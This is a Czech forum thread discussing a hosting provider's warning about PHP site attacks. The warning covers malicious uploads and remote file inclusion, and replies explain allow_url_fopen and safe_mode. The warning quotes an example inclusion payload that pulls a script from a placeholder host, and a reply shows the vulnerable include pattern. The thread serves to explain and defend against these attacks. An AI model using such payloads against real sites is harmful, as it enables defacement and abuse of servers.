Autor Zpráva
Anonymní
Profil *
Tuto zprávu jsem obdržel od jednoho právce hostingu:

V posledních týdnech jsme se setkali se třemi hackerskými útoky neznámou tureckou organizací, která využívá chyb lidí v PHP. Zabezpečte si prosím své scripty správně, nyní Vám popíši, jak přesně využívají chyby lidí a co tento script dělá (ve všech případech byl zaznamenaný ten samý).

Hackerův script hledá ve vyhledávačích stránky a snaží se dostat do stránek, což může učinit pouze pokud by znal heslo na Vaše FTP (což je mizivá pravděpodobnost, že by uhodl) a nebo právě zmiňovanou dírou v PHP.

1. CHYBA!
- hacker použije scripty, kterými lze nahrát nějaký soubor na stránky, natáhne tam script, který se uloží do TMP, vyvolá perl, který ho aktivuje a přepíše všechny indexy na celém serveru (díky tomu že máme SAFE MODE na ON, tak přepíše pouze index toho, ke komu to nahrál).

2. CHYBA!
- mnozí z vás vyvolávají stránky způsobem: index.php?stranka=kontakt, hacker toho využije a pošle do této proměnné něco takovéhoto:
index.php?stranka=http://www.neco.neco/script.txt (v tomto souboru již má naprogramované co má script udělat a stane se totéž jako v předchozím případě).

Proto prosím, věnujte čas kontrole svých scriptů a zabezpečení, neohrožujete tím pouze sebe, ale i všechny ostatní zákazníky našeho webhostingu.

Je něco takového možné? Případně není chyba spíše na straně hostingu?
ah01
Profil
Je něco takového možné?” Ano, je, ale obojí jsou začátečnické chyby ...

Případně není chyba spíše na straně hostingu?” Ne, není
llook
Profil
Popis jedničky mi připadá podivný. Jak jako vyvolá Perl? A jak jako safe_mode=on má vliv na Perl???

Dvojka je celkem rozšířená u začátečníků (takovéto include $_GET['page'] . ".php";), ale se zapnutým safe modem by to mělo ohrozit pouze prostor toho kterého uživatele, který byl tak chytrý (pokud tam není zároveň nějaká chyba na straně hostingu).

Jo a "neznámá turecká organizace", to už je totální ptákovina. Spíš neznámý český puberťák, který si na internetu našel seznamy anonymních proxy.
Václav Martinovský
Profil
Případně není chyba spíše na straně hostingu?

Castecne, v PHP by mel byt vypnuty allow_url_fopen, cimz se globalne zakaze fopen a include vzdalenych souboru (pres http, ftp). My to tak mame a na zadost povolujeme na konkretni domenu (pokud to nekdo explicitne chce, predpoklada se, ze s tim umi zachazet). Hodne zakazniku ma derave skripty (ano, ten sikovny include) a pokud to webhoster necha zaple, tak je sam proti sobe, protoze mu pak pres webserver spamuji roboti, kteri si naincluduji svuj pekny skript na rozesilani mailu :).
Hofy
Profil *
Presne tak, na savane to mame take primarne vyplne a zakaznik si to muze v administraci zapnout.
Toto téma je uzamčeno. Odpověď nelze zaslat.